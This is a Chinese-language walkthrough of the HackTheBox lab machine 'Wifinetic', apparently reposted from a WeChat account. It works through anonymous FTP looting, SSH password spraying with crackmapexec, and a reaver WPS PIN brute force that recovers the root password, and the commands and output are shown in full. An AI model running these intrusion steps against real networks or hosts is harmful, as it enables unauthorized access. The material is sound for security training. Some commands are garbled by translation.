Wifinetic 是一个非常有趣的box,基于 Felemos 虚拟化无线网络的一些很酷的技术。我将从匿名访问 FTP 服务器开始,该服务器包含带有 WPA 无线配置的备份文件。该配置中有一个预共享密钥(密码),也可以通过 SSH 运行。在盒子上,我会发现一些配置好的无线接口,以及reaver WPA 破解工具。这个工具允许我暴力破解无线网络的预共享密钥,这恰好是 root 密码。在 Beyond Root 中,我将研究命令执行,以及为什么它在这个盒子上不能很好地工作。
盒子信息
信息收集
nmap找到三个开放的 TCP 端口:FTP (21)、SSH (22) 和 DNS (53):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.247Starting Nmap 7.80 ( https://nmap.org ) at 2023-09-12 16:18 EDTNmap scan report for 10.10.11.247Host is up (0.093s latency).Not shown: 65532 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh53/tcp open domainNmap done: 1 IP address (1 host up) scanned in 6.78 secondsoxdf@hacky$ nmap -p 21,22,53 -sCV 10.10.11.247Starting Nmap 7.80 ( https://nmap.org ) at 2023-09-12 16:28 EDTNmap scan report for 10.10.11.247Host is up (0.092s latency).PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.3| ftp-anon: Anonymous FTP login allowed (FTP code 230)| -rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf| -rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf| -rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf| ftp-syst:| STAT:| FTP server status:| Connected to ::ffff:10.10.14.6| Logged in as ftp| TYPE: ASCII| No session bandwidth limit| Session timeout in seconds is 300| Control connection is plain text| Data connections will be plain text| At session startup, client count was 3| vsFTPd 3.0.3 - secure, fast, stable|_End of status22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)53/tcp open tcpwrappedService Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 6.64 seconds
FTP存在匿名访问,我肯定想进一步检查。根据OpenSSH版本,主机可能运行 Ubuntu 20.04。UDP 扫描速度慢且不可靠。不过看起来 DNS (53) 和 DHCP (67) 是开放的:
oxdf@hacky$ nmap -sU --top 10 10.10.11.247Starting Nmap 7.80 ( https://nmap.org ) at 2023-09-12 16:26 EDTNmap scan report for 10.10.11.247Host is up (0.092s latency).PORT STATE SERVICE53/udp open|filtered domain67/udp open|filtered dhcps123/udp closed ntp135/udp closed msrpc137/udp closed netbios-ns138/udp closed netbios-dgm161/udp closed snmp445/udp closed microsoft-ds631/udp closed ipp1434/udp closed ms-sql-mNmap done: 1 IP address (1 host up) scanned in 4.03 seconds
查看文件
为了更清楚地了解 FTP 服务器上的内容,我将使用名称“anonymous”进行连接,该存在漏洞不要求输入密码:
ftp 10.10.11.247Connected to 10.10.11.247.220 (vsFTPd 3.0.3)Name (10.10.11.247:oxdf): anonymous230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp>
共享中有五个文件:
ftp> ls229 Entering Extended Passive Mode (|||41883|)150 Here comes the directory listing.-rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt-rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf-rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf-rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf226 Directory send OK.
我将通过关闭提示并使用以下命令来获取所有五个mget:
ftp> prompt offInteractive mode off.ftp> mget *local: MigrateOpenWrt.txt remote: MigrateOpenWrt.txt229 Entering Extended Passive Mode (|||46603|)150 Opening BINARY mode data connection for MigrateOpenWrt.txt (4434 bytes).100% |****************************************************| 4434 12.66 MiB/s 00:00 ETA226 Transfer complete.4434 bytes received in 00:00 (45.51 KiB/s)local: ProjectGreatMigration.pdf remote: ProjectGreatMigration.pdf229 Entering Extended Passive Mode (|||43303|)150 Opening BINARY mode data connection for ProjectGreatMigration.pdf (2501210 bytes).100% |****************************************************| 2442 KiB 1.19 MiB/s 00:00 ETA226 Transfer complete.2501210 bytes received in 00:02 (1.14 MiB/s)local: ProjectOpenWRT.pdf remote: ProjectOpenWRT.pdf229 Entering Extended Passive Mode (|||41309|)150 Opening BINARY mode data connection for ProjectOpenWRT.pdf (60857 bytes).100% |****************************************************| 60857 312.13 KiB/s 00:00 ETA226 Transfer complete.60857 bytes received in 00:00 (208.67 KiB/s)local: backup-OpenWrt-2023-07-26.tar remote: backup-OpenWrt-2023-07-26.tar229 Entering Extended Passive Mode (|||48627|)150 Opening BINARY mode data connection for backup-OpenWrt-2023-07-26.tar (40960 bytes).100% |****************************************************| 40960 418.15 KiB/s 00:00 ETA226 Transfer complete.40960 bytes received in 00:00 (210.50 KiB/s)local: employees_wellness.pdf remote: employees_wellness.pdf229 Entering Extended Passive Mode (|||45844|)150 Opening BINARY mode data connection for employees_wellness.pdf (52946 bytes).100% |****************************************************| 52946 271.76 KiB/s 00:00 ETA226 Transfer complete.52946 bytes received in 00:00 (181.35 KiB/s)
文件浏览
对文件的快速分类可以得出:employees_wellness.pdf- 人力资源经理萨曼莎·伍德 (Samantha Wood) 写的一封关于公司新员工健康计划的信函[email protected]。
ProjectGreatMigration.pdf- 幻灯片大部分都是无意义的,但在最后一张幻灯片中确实包含了更多联系信息:
[email protected]无线网络管理员 Oliver Walker提交的关于现有网络基础设施从 OpenWRT 迁移到 Debian 的提案[email protected]。这个文档有很多可以有用的枚举,尽管对于 Wifinetic,只知道我应该期望 OpenWRT 是完全需要的。
MigrateOpenWrt.txt基于文本的迁移到 Debian 的步骤和子步骤大纲。
backup-OpenWrt-2023-07-26.tar- 包含 WiFi 设置配置文件的存档。
深入挖掘备份,它是一个etc文件夹:
oxdf@hacky$ ls etcconfig dropbear group hosts inittab luci-uploads nftables.d opkg passwd profile rc.local shells shinit sysctl.conf uhttpd.crt uhttpd.key
提供passwd文件存在用户名列表:
|
root:x:0:0:root:/root:/bin/ash daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false ntp:x:123:123:ntp:/var/run/ntp:/bin/false dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false logd:x:514:514:logd:/var/run/logd:/bin/false ubus:x:81:81:ubus:/var/run/ubus:/bin/false netadmin:x:999:999::/home/netadmin:/bin/false |
该config目录有一些文件:
oxdf@hacky$ ls etc/config/dhcp dropbear firewall luci network rpcd system ucitrack uhttpd wireless
唯一有用的是wireless:
oxdf cat etc/config/wirelessconfig wifi-device 'radio0'option type 'mac80211'option path 'virtual/mac80211_hwsim/hwsim0'option cell_density '0'option channel 'auto'option band '2g'option txpower '20'config wifi-device 'radio1'option type 'mac80211'option path 'virtual/mac80211_hwsim/hwsim1'option channel '36'option band '5g'option htmode 'HE80'option cell_density '0'config wifi-iface 'wifinet0'option device 'radio0'option mode 'ap'option ssid 'OpenWrt'option encryption 'psk'option key 'VeRyUniUqWiFIPasswrd1!'option wps_pushbutton '1'config wifi-iface 'wifinet1'option device 'radio1'option mode 'sta'option network 'wwan'option ssid 'OpenWrt'option encryption 'psk'option key 'VeRyUniUqWiFIPasswrd1!'
它定义了两个设备,每个设备上都有一个接口。WiFi 网络有一个预共享密钥(PSK 或密码)。
wifinetic.htb鉴于文档中使用了,我会将其添加到我的/etc/hosts文件中:
| 10.10.11.247 wifinetic.htb |
鉴于 DNS 正在侦听 TCP,我将尝试区域传输以查看是否有任何子域:
oxdf@hacky$ dig asxf @10.10.11.247 wifinetic.htb;; communications error to 10.10.11.247#53: timed out;; communications error to 10.10.11.247#53: timed out;; communications error to 10.10.11.247#53: timed out; <<>> DiG 9.18.12-0ubuntu0.22.04.1-Ubuntu <<>> asxf @10.10.11.247 wifinetic.htb;; global options: +cmd;; no servers could be reached;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17349;; flags: qr aa rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 65494;; QUESTION SECTION:;wifinetic.htb. IN A;; ANSWER SECTION:wifinetic.htb. 0 IN A 10.10.11.247;; Query time: 0 msec;; SERVER: 127.0.0.53#53(127.0.0.53) (UDP);; WHEN: Tue Sep 12 20:44:43 EDT 2023;; MSG SIZE rcvd: 58
我不确定为什么它一开始会超时,但它最终成功并找到了主域。
SSH 密码暴力破解
使用 Wifi 配置中的密码,我将使用通过 SSH 的无线配置中的密码crackmapexec来尝试文件中的每个用户。我喜欢在有多个用户共享该密码的情况下passwd使用。--continue-on-success它找到一个:
crackmapexec ssh 10.10.11.247 -u users -p 'VeRyUniUqWiFIPasswrd1!' -ontinue-on-successSSH 10.10.11.247 22 10.10.11.247 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9SSH 10.10.11.247 22 10.10.11.247 [-] root:VeRyUniUqWiFIPasswrd1! Authentication failed.SSH 10.10.11.247 22 10.10.11.247 [-] daemon:VeRyUniUqWiFIPasswrd1! Authentication failed.SSH 10.10.11.247 22 10.10.11.247 [-] ftp:VeRyUniUqWiFIPasswrd1! Authentication failed.SSH 10.10.11.247 22 10.10.11.247 [-] network:VeRyUniUqWiFIPasswrd1! Authentication failed.SSH 10.10.11.247 22 10.10.11.247 [-] nobody:VeRyUniUqWiFIPasswrd1! Authentication failed.SSH 10.10.11.247 22 10.10.11.247 [-] ntp:VeRyUniUqWiFIPasswrd1! Authentication failed.SSH 10.10.11.247 22 10.10.11.247 [-] dnsmasq:VeRyUniUqWiFIPasswrd1! Authentication failed.SSH 10.10.11.247 22 10.10.11.247 [-] logd:VeRyUniUqWiFIPasswrd1! Authentication failed.SSH 10.10.11.247 22 10.10.11.247 [-] ubus:VeRyUniUqWiFIPasswrd1! Authentication failed.SSH 10.10.11.247 22 10.10.11.247 [+] netadmin:VeRyUniUqWiFIPasswrd1!
我可以使用该用户名/密码进行连接:
oxdf@hacky$ sshpass -p 'VeRyUniUqWiFIPasswrd1!' ssh netadmin@10.10.11.247Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)...[snip]...netadmin@wifinetic:~$
并读取用户标志:
netadmin@wifinetic:~$ cat user.txte5540a0a************************
root 身份进入 shell
netadmin用户的主目录基本上是空的:
netadmin@wifinetic:~$ ls -latotal 28drwxr-xr-x 3 netadmin netadmin 4096 Sep 11 16:40 .drwxr-xr-x 24 root root 4096 Sep 11 16:58 ..lrwxrwxrwx 1 root root 9 Sep 11 16:08 .bash_history -> /dev/null-rw-r--r-- 1 netadmin netadmin 220 Feb 25 2020 .bash_logout-rw-r--r-- 1 netadmin netadmin 3771 Feb 25 2020 .bashrcdrwx------ 2 netadmin netadmin 4096 Sep 11 16:40 .cache-rw-r--r-- 1 netadmin netadmin 807 Feb 25 2020 .profile-rw-r----- 1 root netadmin 32 Sep 13 11:01 user.txt
还有很多其他用户的主目录位于/home:
netadmin@wifinetic:/home$ lsayoung33 dwright27 janderson42 lturner56 mrobinson78 owalker17 sjohnson88 tclark84bwhite3 eroberts25 jletap77 mhughes12 netadmin pharris47 swood93dmorgan99 jallen10 kgarcia22 mickhat nlee61 rturner45 tcarter90
它们都是一样的,有一些标准文件以及.ssh网络管理员无法访问的目录。
/opt有一个share目录似乎与 FTP 上可用的目录相匹配:
netadmin@wifinetic:/opt$ lssharenetadmin@wifinetic:/opt$ cd share/netadmin@wifinetic:/opt/share$ lsbackup-OpenWrt-2023-07-26.tar MigrateOpenWrt.txt ProjectOpenWRT.pdfemployees_wellness.pdf ProjectGreatMigration.pdf
vsftpd.conf中的文件证实/etc/了这一点(用于grep删除以注释标记开头的行#):
netadmin@wifinetic:/etc$ cat vsftpd.conf | grep -v "^#"listen=NOlisten_ipv6=YESanonymous_enable=yeslocal_enable=NOanon_root=/opt/share/no_anon_password=YEShide_ids=YESpasv_min_port=40000pasv_max_port=50000anon_mkdir_write_enable=YESanon_mkdir_write_enable=YESdirmessage_enable=YESuse_localtime=YESxferlog_enable=YESconnect_from_port_20=YESchown_uploads=YESchown_username=ftpsecure_chroot_dir=/var/run/vsftpd/emptypam_service_name=vsftpdrsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pemrsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.keyssl_enable=NO
特权二进制文件
我将始终检查有趣的 SetUID 和 SetGID 二进制文件。[LinPEAS])() 等枚举工具也将识别这些:
netadmin@wifinetic:~$ find / -perm -4000 -or -perm -2000 2>/dev/null/usr/local/lib/python3.8/usr/local/lib/python3.8/dist-packages/usr/sbin/pam_extrausers_chkpwd/usr/sbin/unix_chkpwd/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/lib/eject/dmcrypt-get-device/usr/lib/x86_64-linux-gnu/utempter/utempter/usr/lib/snapd/snap-confine/usr/lib/policykit-1/polkit-agent-helper-1/usr/lib/openssh/ssh-keysign/usr/bin/wall/usr/bin/mount/usr/bin/sudo/usr/bin/gpasswd/usr/bin/ssh-agent/usr/bin/umount/usr/bin/passwd/usr/bin/fusermount/usr/bin/expiry/usr/bin/bsd-write/usr/bin/chsh/usr/bin/chage/usr/bin/at/usr/bin/chfn/usr/bin/crontab/usr/bin/newgrp/usr/bin/su/var/local/var/log/journal/var/log/journal/8e7b2e7692df48faa4e42d6cfc791ed2/var/mail/run/log/journal
这些看起来都是标准的。我还将寻找具有以下功能的二进制文件:
netadmin@wifinetic:~$ getcap -r / 2>/dev/null/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep/usr/bin/ping = cap_net_raw+ep/usr/bin/mtr-packet = cap_net_raw+ep/usr/bin/traceroute6.iputils = cap_net_raw+ep/usr/bin/reaver = cap_net_raw+ep
最后一个跳出来了!Reaver!
查看网络接口,有六个!
:~$ ifconfigeth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 10.10.11.247 netmask 255.255.254.0 broadcast 10.10.11.255inet6 dead:beef::250:56ff:feb9:a136 prefixlen 64 scopeid 0x0<global>inet6 fe80::250:56ff:feb9:a136 prefixlen 64 scopeid 0x20<link>ether 00:50:56:b9:a1:36 txqueuelen 1000 (Ethernet)RX packets 78157 bytes 4862131 (4.8 MB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 67703 bytes 6498829 (6.4 MB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536inet 127.0.0.1 netmask 255.0.0.0inet6 ::1 prefixlen 128 scopeid 0x10<host>loop txqueuelen 1000 (Local Loopback)RX packets 32188 bytes 1932028 (1.9 MB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 32188 bytes 1932028 (1.9 MB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0mon0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500unspec 02-00-00-00-02-00-30-3A-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)RX packets 134589 bytes 23695914 (23.6 MB)RX errors 0 dropped 134589 overruns 0 frame 0TX packets 0 bytes 0 (0.0 B)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255inet6 fe80::ff:fe00:0 prefixlen 64 scopeid 0x20<link>ether 02:00:00:00:00:00 txqueuelen 1000 (Ethernet)RX packets 4486 bytes 422644 (422.6 KB)RX errors 0 dropped 617 overruns 0 frame 0TX packets 5183 bytes 601033 (601.0 KB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0wlan1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 192.168.1.23 netmask 255.255.255.0 broadcast 192.168.1.255inet6 fe80::ff:fe00:100 prefixlen 64 scopeid 0x20<link>ether 02:00:00:00:01:00 txqueuelen 1000 (Ethernet)RX packets 1304 bytes 181765 (181.7 KB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 4486 bytes 503392 (503.3 KB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0wlan2: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)RX packets 0 bytes 0 (0.0 B)RX errors 0 dropped 0 overruns 0 frame 0TX packets 0 bytes 0 (0.0 B)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0是标准 LAN 接口,具有我一直在攻击的 10.10.11.247 IP。lo是标准的 localhost 接口,地址为 127.0.0.1。
mon接口(如mon0)通常用于监视模式接口。它用于嗅探和监控 WiFi 网络上的流量。wlan接口(与其他三个接口一样)用于与无线网络连接。
无线设置通常存储在 中/etc/wpa_supplicant.conf,该文件存在,但 netadmin 无法读取它:
netadmin@wifinetic:/etc$ cat wpa_supplicant.confcat: wpa_supplicant.conf: Permission denied
iw dev将提供有关无线接口的更多信息:
:~$ iw devphy#2Interface mon0ifindex 7wdev 0x200000002addr 02:00:00:00:02:00type monitortxpower 20.00 dBmInterface wlan2ifindex 5wdev 0x200000001addr 02:00:00:00:02:00type managedtxpower 20.00 dBmphy#1interfacewdev 0x100000155addr 42:00:00:00:01:00type P2P-devicetxpower 20.00 dBmInterface wlan1ifindex 4wdev 0x100000001addr 02:00:00:00:01:00ssid OpenWrttype managedchannel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHztxpower 20.00 dBmphy#0Interface wlan0ifindex 3wdev 0x1addr 02:00:00:00:00:00ssid OpenWrttype APchannel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHztxpower 20.00 dBm
这提供了有关每个物理网络接口及其上的接口的大量信息。
wlan0已开启phy0。它作为type APSSID 为OpenWrt通道 1 的接入点 ( ) 运行。
wlan1处于打开状态phy1,并且正在“托管”模式下运行,这表明它是客户端。鉴于 SSID、信道和中心频率与 相同wlan0,则这是该接入点上的客户端。
wlan2并且mon0正在开启phy2。wlan2也充当客户端(在“托管”模式下),其中 asmon0疑似处于监视模式。wlan2没有显示任何连接。
WPA 暴力破解
WiFi 保护设置 (WPS) 是一项标准,旨在使连接 WiFi 路由器变得更加容易,尤其是在家庭设置中。该设备上印有 8 位 PIN 码,用户可以输入该 PIN 码来加入网络。
实现中存在一个问题,使得暴力破解 8 位引脚变得微不足道。理论上,这意味着提供一亿个可能的引脚。实际上,WPS 系统会告诉您前四位数字是否正确,然后告诉您接下来的三位数字是否正确。它还使用最后一位数字作为校验和。这意味着要有效地进行暴力破解,攻击者只需对前 4 个尝试 10,000 种可能性,对后 4 个尝试 1,000 种可能性,或者最多 11,000 个引脚(远少于 1 亿!)。
Reaver是一个用于通过暴力破解WPS引脚来恢复网络WPA PSK(密码)的工具。
运行reaver显示两个必需的参数:
netadmin@wifinetic:~$ reaverReaver v1.6.5 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>Required Arguments:-i, --interface=<wlan> Name of the monitor-mode interface to use-b, --bssid=<mac> BSSID of the target APOptional Arguments:-m, --mac=<mac> MAC of the host system-e, --essid=<ssid> ESSID of the target AP-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)-s, --session=<file> Restore a previous session file-C, --exec=<command> Execute the supplied command upon successful pin recovery-f, --fixed Disable channel hopping-5, --5ghz Use 5GHz 802.11 channels-v, --verbose Display non-critical warnings (-vv or -vvv for more)-q, --quiet Only display critical messages-h, --help Show helpAdvanced Options:-p, --pin=<wps pin> Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)-d, --delay=<seconds> Set the delay between pin attempts [1]-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]-g, --max-attempts=<num> Quit after num pin attempts-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts-t, --timeout=<seconds> Set the receive timeout period [10]-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.40]-A, --no-associate Do not associate with the AP (association must be done by another application)-N, --no-nacks Do not send NACK messages when out of order packets are received-S, --dh-small Use small DH keys to improve crack speed-L, --ignore-locks Ignore locked state reported by the target AP-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet-J, --timeout-is-nack Treat timeout as NACK (DIR-300/320)-F, --ignore-fcs Ignore frame checksum errors-w, --win7 Mimic a Windows 7 registrar [False]-K, --pixie-dust Run pixiedust attack-Z Run pixiedust attackExample:reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv
我需要监控模式接口的名称和目标 AP 的 BSSID。底部的示例reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv显示 BSSID 看起来像 MAC 地址。
目标 AP 是,它具有来自上面命令的wlan0MAC 。监控模式接口是。大多数教程都会展示如何使用该命令来获取 BSSID/MAC。这在这里不起作用,我将在Beyond Root中查看它iw02:00:00:00:00:00 mon0reaverwash。
我将使用它们来运行reaver:
netadmin:~$ reaver -i mon0 -b 02:00:00:00:00:00 -vvReaver v1.6.5 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner.com>[+] Waiting for beacon from 02:00:00:00:00:00[+] Switching mon0 to channel 1[+] Received beacon from 02:00:00:00:00:00[+] Trying pin "12345670"[+] Sending authentication request[!] Found packet with bad FCS, skipping...[+] Sending association request[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message[+] Received M5 message[+] Sending M6 message[+] Received M7 message[+] Sending WSC NACK[+] Sending WSC NACK[+] Pin cracked in 2 seconds[+] WPS PIN: '12345670'[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'[+] AP SSID: 'OpenWrt'[+] Nothing done, nothing to save.
它能够很快破解无线网络的 WPA 密码(或预共享密钥 (PSK))。
此密码可用作机器上 root 的密码,无论是su在现有会话中:
netadmin@wifinetic:~$ su -Password:root@wifinetic:~#
或者开始一个新的 SSH 会话:
oxdf@hacky$ sshpass -p 'WhatIsRealAnDWhAtIsNot51121!' ssh root@10.10.11.247Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)...[snip]...root@wifinetic:~#
无论哪种方式,我都可以抓住root.txt:
root@wifinetic:~# cat root.txtb8e6c359************************
背景
大多数展示如何运行的教程reaver都会使用诸如wash -i mon0获取可用网络的 BSSID 之类的内容并枚举 WPS 是否已锁定(这使得暴力破解的可能性大大降低)。
wash是作为 的一部分提供的工具reaver,旨在枚举网络。但它需要CAP_NET_RAW能力,就像reaver现在一样。
在攻击机上没有 root 权限的情况下执行此攻击是不寻常的。通常,这种攻击是由本地靠近 WiFi 网络的攻击者控制器硬件发起的。但即使有人在受感染的机器上执行此操作,他们也需要 root,因为在现实世界中不太可能找到reaver具有必要功能的设备,就像 HTB 的情况一样。
以 netadmin 身份运行 Wash
在盒子上有一个非 root shell 的情况下,如果我尝试wash -i mon0按照建议运行,它就会挂起:
netadmin@wifinetic:~$ wash -i mon0BSSIDCh dBm WPS Lck Vendor ESSID
来源审查
源代码wash在这里,从函数开始wash_main。我不是 C 方面的专家,但它似乎正在网络上进行积极的工作。
send_probe_request 这里调用了一个发送数据包的函数。还有一个循环next_packet。基于此,wash需要某种功能或 root 权限才能工作是完全有道理的。事实上,当我尝试wash在其他接口上运行时,我会收到错误:
netadmin@wifinetic:~$ wash -i wlan0[X] ERROR: pcap_activate status -1[X] PCAP: generic error codecouldn't get pcap handle, exitingnetadmin@wifinetic:~$ wash -i wlan1[X] ERROR: pcap_activate status -1[X] PCAP: generic error codecouldn't get pcap handle, exitingnetadmin@wifinetic:~$ wash -i wlan2[X] ERROR: pcap_activate status -1[X] PCAP: generic error codecouldn't get pcap handle, exiting
获得root权限
从这一点来看,这显然是一个权限问题。因此,当以 root 身份运行时给出相同的结果是令人惊讶的:
root@wifinetic:~# wash -i mon0BSSIDCh dBm WPS Lck Vendor ESSID--------------------------------------------------------------------------------
有趣的是,它现在挂起而不是在wlan0和上失败wlan1:
root@wifinetic:~# wash -i wlan0BSSID Ch dBm WPS Lck Vendor ESSID--------------------------------------------------------------------------------^Croot@wifinetic:~# wash -i wlan1BSSID Ch dBm WPS Lck Vendor ESSID--------------------------------------------------------------------------------^C
更有趣的是,它适用于wlan2:
root@wifinetic:~# wash -i wlan2BSSID Ch dBm WPS Lck Vendor ESSID--------------------------------------------------------------------------------02:00:00:00:00:00 1 -30 2.0 No OpenWrt
更有趣的是,当我在 上运行此命令时wlan2,我wash -i mon0在另一个终端中运行,并同时打印结果:
root@wifinetic:~# wash -i mon0BSSID Ch dBm WPS Lck Vendor ESSID--------------------------------------------------------------------------------02:00:00:00:00:00 1 -30 2.0 No OpenWrt
工作原理
我目前解释这一切的理论是:wlan2是mon0相同的物理设备。mon0处于监控模式。它无法传输出站数据包。wash其工作原理是向外发送探测,然后嗅探响应。出站探测和嗅探几乎肯定发生在不同的线程中。当我运行时wash -i mon0,它尝试发送探测,但失败(由于监视模式)。然后它挂起等待响应。当我运行时wash -i wlan2,它成功发送探测。两个接口都能够查看响应、解析它并打印。
这就是我现在所拥有的!如果您有更好的理解,请联系vx wangluoxiaodaren
原文始发于微信公众号(守护安全团队):玩转HTB靶场系列之wifinetic
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论